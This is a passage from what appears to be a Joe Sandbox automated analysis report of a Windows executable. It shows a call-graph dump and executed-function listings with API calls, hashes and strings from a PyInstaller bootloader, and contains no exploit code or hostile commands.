7ff72935f5e8 EnterCriticalSection 19225->19245 19240 7ff729358dfd 19239->19240 19241 7ff729358dd4 GetProcAddress 19239->19241 19243 7ff729358e09 19240->19243 19244 7ff729358e02 FreeLibrary 19240->19244 19242 7ff729358de6 19241->19242 19242->19240 19243->19217 19244->19243 19256 7ff72934ae00 19257 7ff72934ae2e 19256->19257 19258 7ff72934ae15 19256->19258 19258->19257 19260 7ff72935c90c 12 API calls 19258->19260 19259 7ff72934ae8e 19260->19259 19915 7ff72936a10e 19916 7ff72936a11d 19915->19916 19917 7ff72936a127 19915->19917 19919 7ff72935f648 LeaveCriticalSection 19916->19919 19921 7ff72935ec9c 19922 7ff72935ee8e 19921->19922 19924 7ff72935ecde _isindst 19921->19924 19923 7ff7293543f4 _get_daylight 11 API calls 19922->19923 19941 7ff72935ee7e 19923->19941 19924->19922 19927 7ff72935ed5e _isindst 19924->19927 19925 7ff72934b870 _log10_special 8 API calls 19926 7ff72935eea9 19925->19926 19942 7ff7293654a4 19927->19942 19932 7ff72935eeba 19933 7ff729359c10 _isindst 17 API calls 19932->19933 19935 7ff72935eece 19933->19935 19939 7ff72935edbb 19939->19941 19967 7ff7293654e8 19939->19967 19941->19925 19943 7ff7293654b3 19942->19943 19944 7ff72935ed7c 19942->19944 19974 7ff72935f5e8 EnterCriticalSection 19943->19974 19949 7ff7293648a8 19944->19949 19950 7ff72935ed91 19949->19950 19951 7ff7293648b1 19949->19951 19950->19932 19955 7ff7293648d8 19950->19955 19952 7ff7293543f4 _get_daylight 11 API calls 19951->19952 19953 7ff7293648b6 19952->19953 19954 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 19953->19954 19954->19950 19956 7ff7293648e1 19955->19956 19957 7ff72935eda2 19955->19957 19958 7ff7293543f4 _get_daylight 11 API calls 19956->19958 19957->19932 19961 7ff729364908 19957->19961 19959 7ff7293648e6 19958->19959 19960 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 19959->19960 19960->19957 19962 7ff72935edb3 19961->19962 19963 7ff729364911 19961->19963 19962->19932 19962->19939 19964 7ff7293543f4 _get_daylight 11 API calls 19963->19964 19965 7ff729364916 19964->19965 19966 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 19965->19966 19966->19962 19975 7ff72935f5e8 EnterCriticalSection 19967->19975 19570 7ff729354720 19571 7ff72935472b 19570->19571 19579 7ff72935e5b4 19571->19579 19592 7ff72935f5e8 EnterCriticalSection 19579->19592 19616 7ff72935b830 19627 7ff72935f5e8 EnterCriticalSection 19616->19627 19100 7ff729354938 19101 7ff72935496f 19100->19101 19102 7ff729354952 19100->19102 19101->19102 19103 7ff729354982 CreateFileW 19101->19103 19104 7ff7293543d4 _fread_nolock 11 API calls 19102->19104 19105 7ff7293549ec 19103->19105 19106 7ff7293549b6 19103->19106 19107 7ff729354957 19104->19107 19151 7ff729354f14 19105->19151 19125 7ff729354a8c GetFileType 19106->19125 19110 7ff7293543f4 _get_daylight 11 API calls 19107->19110 19113 7ff72935495f 19110->19113 19118 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 19113->19118 19114 7ff7293549cb CloseHandle 19119 7ff72935496a 19114->19119 19115 7ff7293549e1 CloseHandle 19115->19119 19116 7ff7293549f5 19120 7ff729354368 _fread_nolock 11 API calls 19116->19120 19117 7ff729354a20 19172 7ff729354cd4 19117->19172 19118->19119 19123 7ff7293549ff 19120->19123 19123->19119 19126 7ff729354b97 19125->19126 19127 7ff729354ada 19125->19127 19129 7ff729354b9f 19126->19129 19130 7ff729354bc1 19126->19130 19128 7ff729354b06 GetFileInformationByHandle 19127->19128 19132 7ff729354e10 21 API calls 19127->19132 19133 7ff729354b2f 19128->19133 19134 7ff729354bb2 GetLastError 19128->19134 19129->19134 19135 7ff729354ba3 19129->19135 19131 7ff729354be4 PeekNamedPipe 19130->19131 19137 7ff729354b82 19130->19137 19131->19137 19138 7ff729354af4 19132->19138 19139 7ff729354cd4 51 API calls 19133->19139 19136 7ff729354368 _fread_nolock 11 API calls 19134->19136 19140 7ff7293543f4 _get_daylight 11 API calls 19135->19140 19136->19137 19141 7ff72934b870 _log10_special 8 API calls 19137->19141 19138->19128 19138->19137 19142 7ff729354b3a 19139->19142 19140->19137 19143 7ff7293549c4 19141->19143 19189 7ff729354c34 19142->19189 19143->19114 19143->19115 19146 7ff729354c34 10 API calls 19147 7ff729354b59 19146->19147 19148 7ff729354c34 10 API calls 19147->19148 19149 7ff729354b6a 19148->19149 19149->19137 19150 7ff7293543f4 _get_daylight 11 API calls 19149->19150 19150->19137 19152 7ff729354f4a 19151->19152 19153 7ff729354fe2 __vcrt_freefls 19152->19153 19154 7ff7293543f4 _get_daylight 11 API calls 19152->19154 19155 7ff72934b870 _log10_special 8 API calls 19153->19155 19156 7ff729354f5c 19154->19156 19157 7ff7293549f1 19155->19157 19158 7ff7293543f4 _get_daylight 11 API calls 19156->19158 19157->19116 19157->19117 19159 7ff729354f64 19158->19159 19160 7ff729357118 45 API calls 19159->19160 19161 7ff729354f79 19160->19161 19162 7ff729354f8b 19161->19162 19163 7ff729354f81 19161->19163 19165 7ff7293543f4 _get_daylight 11 API calls 19162->19165 19164 7ff7293543f4 _get_daylight 11 API calls 19163->19164 19169 7ff729354f86 19164->19169 19166 7ff729354f90 19165->19166 19166->19153 19167 7ff7293543f4 _get_daylight 11 API calls 19166->19167 19168 7ff729354f9a 19167->19168 19170 7ff729357118 45 API calls 19168->19170 19169->19153 19171 7ff729354fd4 GetDriveTypeW 19169->19171 19170->19169 19171->19153 19173 7ff729354cfc 19172->19173 19181 7ff729354a2d 19173->19181 19196 7ff72935ea34 19173->19196 19175 7ff729354d90 19176 7ff72935ea34 51 API calls 19175->19176 19175->19181 19177 7ff729354da3 19176->19177 19178 7ff72935ea34 51 API calls 19177->19178 19177->19181 19179 7ff729354db6 19178->19179 19180 7ff72935ea34 51 API calls 19179->19180 19179->19181 19180->19181 19182 7ff729354e10 19181->19182 19183 7ff729354e2a 19182->19183 19184 7ff729354e61 19183->19184 19185 7ff729354e3a 19183->19185 19186 7ff72935e8c8 21 API calls 19184->19186 19187 7ff729354e4a 19185->19187 19188 7ff729354368 _fread_nolock 11 API calls 19185->19188 19186->19187 19187->19123 19188->19187 19190 7ff729354c5d FileTimeToSystemTime 19189->19190 19191 7ff729354c50 19189->19191 19192 7ff729354c71 SystemTimeToTzSpecificLocalTime 19190->19192 19193 7ff729354c58 19190->19193 19191->19190 19191->19193 19192->19193 19194 7ff72934b870 _log10_special 8 API calls 19193->19194 19195 7ff729354b49 19194->19195 19195->19146 19197 7ff72935ea65 19196->19197 19198 7ff72935ea41 19196->19198 19201 7ff72935ea9f 19197->19201 19203 7ff72935eabe 19197->19203 19198->19197 19199 7ff72935ea46 19198->19199 19200 7ff7293543f4 _get_daylight 11 API calls 19199->19200 19204 7ff72935ea4b 19200->19204 19202 7ff7293543f4 _get_daylight 11 API calls 19201->19202 19205 7ff72935eaa4 19202->19205 19206 7ff729354178 45 API calls 19203->19206 19207 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 19204->19207 19208 7ff729359bf0 _invalid_parameter_noinfo 37 API calls 19205->19208 19211 7ff72935eacb 19206->19211 19209 7ff72935ea56 19207->19209 19210 7ff72935eaaf 19208->19210 19209->19175 19210->19175 19211->19210 19212 7ff72935f7ec 51 API calls 19211->19212 19212->19211 20248 7ff7293609c0 20259 7ff7293666f4 20248->20259 20260 7ff729366701 20259->20260 20261 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20260->20261 20262 7ff72936671d 20260->20262 20261->20260 20263 7ff729359c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20262->20263 20264 7ff7293609c9 20262->20264 20263->20262 20265 7ff72935f5e8 EnterCriticalSection 20264->20265

                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                        Function 00007FF729341000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 0 7ff729341000-7ff729343536 call 7ff72934f138 call 7ff72934f140 call 7ff72934bb70 call 7ff729354700 call 7ff729354794 call 7ff7293433e0 14 7ff729343538-7ff72934353f 0->14 15 7ff729343544-7ff729343566 call 7ff7293418f0 0->15 16 7ff72934371a-7ff729343735 call 7ff72934b870 14->16 21 7ff72934356c-7ff729343583 call 7ff729341bf0 15->21 22 7ff729343736-7ff72934374c call 7ff729343f70 15->22 25 7ff729343588-7ff7293435c1 21->25 29 7ff72934374e-7ff72934377b call 7ff7293476a0 22->29 30 7ff729343785-7ff72934379a call 7ff7293425f0 22->30 27 7ff7293435c7-7ff7293435cb 25->27 28 7ff729343653-7ff72934366d call 7ff729347e10 25->28 31 7ff729343638-7ff72934364d call 7ff7293418e0 27->31 32 7ff7293435cd-7ff7293435e5 call 7ff729354560 27->32 43 7ff72934366f-7ff729343675 28->43 44 7ff729343695-7ff72934369c 28->44 46 7ff72934377d-7ff729343780 call 7ff72934f36c 29->46 47 7ff72934379f-7ff7293437be call 7ff729341bf0 29->47 45 7ff729343712 30->45 31->27 31->28 49 7ff7293435e7-7ff7293435eb 32->49 50 7ff7293435f2-7ff72934360a call 7ff729354560 32->50 51 7ff729343677-7ff729343680 43->51 52 7ff729343682-7ff729343690 call 7ff72935415c 43->52 54 7ff7293436a2-7ff7293436c0 call 7ff729347e10 call 7ff729347f80 44->54 55 7ff729343844-7ff729343863 call 7ff729343e90 44->55 45->16 46->30 61 7ff7293437c1-7ff7293437ca 47->61 49->50 66 7ff729343617-7ff72934362f call 7ff729354560 50->66 67 7ff72934360c-7ff729343610 50->67 51->52 52->44 80 7ff72934380f-7ff72934381e call 7ff729348400 54->80 81 7ff7293436c6-7ff7293436c9 54->81 69 7ff729343871-7ff729343882 call 7ff729341bf0 55->69 70 7ff729343865-7ff72934386f call 7ff729343fe0 55->70 61->61 65 7ff7293437cc-7ff7293437e9 call 7ff7293418f0 61->65 65->25 84 7ff7293437ef-7ff729343800 call 7ff7293425f0 65->84 66->31 85 7ff729343631 66->85 67->66 77 7ff729343887-7ff7293438a1 call 7ff7293486b0 69->77 70->77 94 7ff7293438af-7ff7293438c1 SetDllDirectoryW 77->94 95 7ff7293438a3 77->95 92 7ff72934382c-7ff72934382f call 7ff729347c40 80->92 93 7ff729343820 80->93 81->80 86 7ff7293436cf-7ff7293436f6 call 7ff729341bf0 81->86 84->45 85->31 97 7ff7293436fc-7ff729343703 call 7ff7293425f0 86->97 98 7ff729343805-7ff72934380d call 7ff72935415c 86->98 103 7ff729343834-7ff729343836 92->103 93->92 100 7ff7293438d0-7ff7293438ec call 7ff729346560 call 7ff729346b00 94->100 101 7ff7293438c3-7ff7293438ca 94->101 95->94 108 7ff729343708-7ff72934370a 97->108 98->77 118 7ff729343947-7ff72934394a call 7ff729346510 100->118 119 7ff7293438ee-7ff7293438f4 100->119 101->100 104 7ff729343a50-7ff729343a58 101->104 103->77 111 7ff729343838 103->111 109 7ff729343a5a-7ff729343a77 PostMessageW GetMessageW 104->109 110 7ff729343a7d-7ff729343aaf call 7ff7293433d0 call 7ff729343080 call 7ff7293433a0 call 7ff729346780 call 7ff729346510 104->110 108->45 109->110 111->55 125 7ff72934394f-7ff729343956 118->125 120 7ff72934390e-7ff729343918 call 7ff729346970 119->120 121 7ff7293438f6-7ff729343903 call 7ff7293465a0 119->121 134 7ff72934391a-7ff729343921 120->134 135 7ff729343923-7ff729343931 call 7ff729346cd0 120->135 121->120 132 7ff729343905-7ff72934390c 121->132 125->104 129 7ff72934395c-7ff729343966 call 7ff7293430e0 125->129 129->108 142 7ff72934396c-7ff729343980 call 7ff7293483e0 129->142 137 7ff72934393a-7ff729343942 call 7ff729342870 call 7ff729346780 132->137 134->137 135->125 147 7ff729343933 135->147 137->118 151 7ff729343982-7ff72934399f PostMessageW GetMessageW 142->151 152 7ff7293439a5-7ff7293439e1 call 7ff729347f20 call 7ff729347fc0 call 7ff729346780 call 7ff729346510 call 7ff729347ec0 142->152 147->137 151->152 162 7ff7293439e6-7ff7293439e8 152->162 163 7ff7293439ea-7ff729343a00 call 7ff7293481f0 call 7ff729347ec0 162->163 164 7ff729343a3d-7ff729343a4b call 7ff7293418a0 162->164 163->164 171 7ff729343a02-7ff729343a10 163->171 164->108 172 7ff729343a12-7ff729343a2c call 7ff7293425f0 call 7ff7293418a0 171->172 173 7ff729343a31-7ff729343a38 call 7ff729342870 171->173 172->108 173->164
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileModuleName
                                                                                                                                                                                                                        • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                                                                                                                                                        • API String ID: 514040917-585287483
                                                                                                                                                                                                                        • Opcode ID: 422ca831442fbe414948a006302531e6ba017afca8630620d5a5ff8703b17b3a
                                                                                                                                                                                                                        • Instruction ID: 1a8e6c0bf640bda69dd5e90c7595948f2064d6f62764e992451af9d87b6698c8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 422ca831442fbe414948a006302531e6ba017afca8630620d5a5ff8703b17b3a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95F19F21A0868251EA18FF21EDD42F9E671EF54780FCA503DDA5D43297EF2CE558EB20
                                                                                                                                                                                                                        Function 00007FF729365C74 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 335 7ff729365c74-7ff729365ce7 call 7ff7293659a8 338 7ff729365ce9-7ff729365cf2 call 7ff7293543d4 335->338 339 7ff729365d01-7ff729365d0b call 7ff729357830 335->339 344 7ff729365cf5-7ff729365cfc call 7ff7293543f4 338->344 345 7ff729365d0d-7ff729365d24 call 7ff7293543d4 call 7ff7293543f4 339->345 346 7ff729365d26-7ff729365d8f CreateFileW 339->346 359 7ff729366042-7ff729366062 344->359 345->344 347 7ff729365e0c-7ff729365e17 GetFileType 346->347 348 7ff729365d91-7ff729365d97 346->348 354 7ff729365e6a-7ff729365e71 347->354 355 7ff729365e19-7ff729365e54 GetLastError call 7ff729354368 CloseHandle 347->355 351 7ff729365dd9-7ff729365e07 GetLastError call 7ff729354368 348->351 352 7ff729365d99-7ff729365d9d 348->352 351->344 352->351 357 7ff729365d9f-7ff729365dd7 CreateFileW 352->357 362 7ff729365e79-7ff729365e7c 354->362 363 7ff729365e73-7ff729365e77 354->363 355->344 370 7ff729365e5a-7ff729365e65 call 7ff7293543f4 355->370 357->347 357->351 364 7ff729365e82-7ff729365ed7 call 7ff729357748 362->364 365 7ff729365e7e 362->365 363->364 373 7ff729365ed9-7ff729365ee5 call 7ff729365bb0 364->373 374 7ff729365ef6-7ff729365f27 call 7ff729365728 364->374 365->364 370->344 373->374 380 7ff729365ee7 373->380 381 7ff729365f2d-7ff729365f6f 374->381 382 7ff729365f29-7ff729365f2b 374->382 383 7ff729365ee9-7ff729365ef1 call 7ff729359dd0 380->383 384 7ff729365f91-7ff729365f9c 381->384 385 7ff729365f71-7ff729365f75 381->385 382->383 383->359 387 7ff729366040 384->387 388 7ff729365fa2-7ff729365fa6 384->388 385->384 386 7ff729365f77-7ff729365f8c 385->386 386->384 387->359 388->387 390 7ff729365fac-7ff729365ff1 CloseHandle CreateFileW 388->390 392 7ff729365ff3-7ff729366021 GetLastError call 7ff729354368 call 7ff729357970 390->392 393 7ff729366026-7ff72936603b 390->393 392->393 393->387
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1617910340-0
                                                                                                                                                                                                                        • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                        • Instruction ID: 28710949f67442294a4aa7b5604458390d0fb2853d6c89f23e226c0abd5a1f4e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AFC1C237B28A4186EB10DF68C8802AC7771FB49BA8B46023DDB1E97796CF38D051DB14
                                                                                                                                                                                                                        Function 00007FF7293479B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • FindFirstFileW.KERNELBASE(?,00007FF729347EF9,00007FF7293439E6), ref: 00007FF729347A1B
                                                                                                                                                                                                                        • RemoveDirectoryW.KERNEL32(?,00007FF729347EF9,00007FF7293439E6), ref: 00007FF729347A9E
                                                                                                                                                                                                                        • DeleteFileW.KERNELBASE(?,00007FF729347EF9,00007FF7293439E6), ref: 00007FF729347ABD
                                                                                                                                                                                                                        • FindNextFileW.KERNELBASE(?,00007FF729347EF9,00007FF7293439E6), ref: 00007FF729347ACB
                                                                                                                                                                                                                        • FindClose.KERNEL32(?,00007FF729347EF9,00007FF7293439E6), ref: 00007FF729347ADC
                                                                                                                                                                                                                        • RemoveDirectoryW.KERNELBASE(?,00007FF729347EF9,00007FF7293439E6), ref: 00007FF729347AE5
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                        • String ID: %s\*
                                                                                                                                                                                                                        • API String ID: 1057558799-766152087
                                                                                                                                                                                                                        • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                                                        • Instruction ID: e2449cabe86f8360590bf51dd2230c9f420e4f0688081f260ad957e7232bb56e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B841B121A0C94295EA30AF24ECC45B9A370FF94750FCA123ED59E42786DF3CD64A9F21
                                                                                                                                                                                                                        Function 00007FF7293485A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                                                                                                        • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                        • Instruction ID: 12b3ee21e8b68d667741b6274529f9aad1316c7fb341dd06f069d54d63069557
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0FF0A422A1C68186F7A09F64BCC83A6B3B0EB45328F89123DDA6D066D5CF3CD0589E04
                                                                                                                                                                                                                        Function 00007FF72935FBD8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1010374628-0
                                                                                                                                                                                                                        • Opcode ID: a8238ebacfbb29389201daedac3868d1c225100c6328c8ae619a1fe2ce119bc6
                                                                                                                                                                                                                        • Instruction ID: d9a46996b5f9535bd1487812facc2c0db91c9a826f7bfa01ecee4a1cb8973888
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a8238ebacfbb29389201daedac3868d1c225100c6328c8ae619a1fe2ce119bc6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A02A021A0964250EA65BF129C85279DAB1EF0DBA0FCD453DDD6D867D3DE3CE401AB20
                                                                                                                                                                                                                        Function 00007FF7293418F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 179 7ff7293418f0-7ff72934192b call 7ff729343f70 182 7ff729341bc1-7ff729341be5 call 7ff72934b870 179->182 183 7ff729341931-7ff729341971 call 7ff7293476a0 179->183 188 7ff729341977-7ff729341987 call 7ff72934f9f4 183->188 189 7ff729341bae-7ff729341bb1 call 7ff72934f36c 183->189 194 7ff729341989-7ff72934199c call 7ff729342760 188->194 195 7ff7293419a1-7ff7293419bd call 7ff72934f6bc 188->195 193 7ff729341bb6-7ff729341bbe 189->193 193->182 194->189 200 7ff7293419d7-7ff7293419ec call 7ff729354154 195->200 201 7ff7293419bf-7ff7293419d2 call 7ff729342760 195->201 206 7ff7293419ee-7ff729341a01 call 7ff729342760 200->206 207 7ff729341a06-7ff729341a87 call 7ff729341bf0 * 2 call 7ff72934f9f4 200->207 201->189 206->189 215 7ff729341a8c-7ff729341a9f call 7ff729354170 207->215 218 7ff729341ab9-7ff729341ad2 call 7ff72934f6bc 215->218 219 7ff729341aa1-7ff729341ab4 call 7ff729342760 215->219 224 7ff729341aec-7ff729341b08 call 7ff72934f430 218->224 225 7ff729341ad4-7ff729341ae7 call 7ff729342760 218->225 219->189 230 7ff729341b0a-7ff729341b16 call 7ff7293425f0 224->230 231 7ff729341b1b-7ff729341b29 224->231 225->189 230->189 231->189 233 7ff729341b2f-7ff729341b3e 231->233 235 7ff729341b40-7ff729341b46 233->235 236 7ff729341b48-7ff729341b55 235->236 237 7ff729341b60-7ff729341b6f 235->237 238 7ff729341b71-7ff729341b7a 236->238 237->237 237->238 239 7ff729341b7c-7ff729341b7f 238->239 240 7ff729341b8f 238->240 239->240 241 7ff729341b81-7ff729341b84 239->241 242 7ff729341b91-7ff729341bac 240->242 241->240 243 7ff729341b86-7ff729341b89 241->243 242->189 242->235 243->240 244 7ff729341b8b-7ff729341b8d 243->244 244->242
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1744456568.00007FF729341000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF729340000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744422814.00007FF729340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744504893.00007FF72936B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF72937E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744550775.00007FF729384000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1744630362.00007FF729386000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff729340000_4F82.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _fread_nolock$Message
                                                                                                                                                                                                                        • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                        • API String ID: 677216364-3497178890
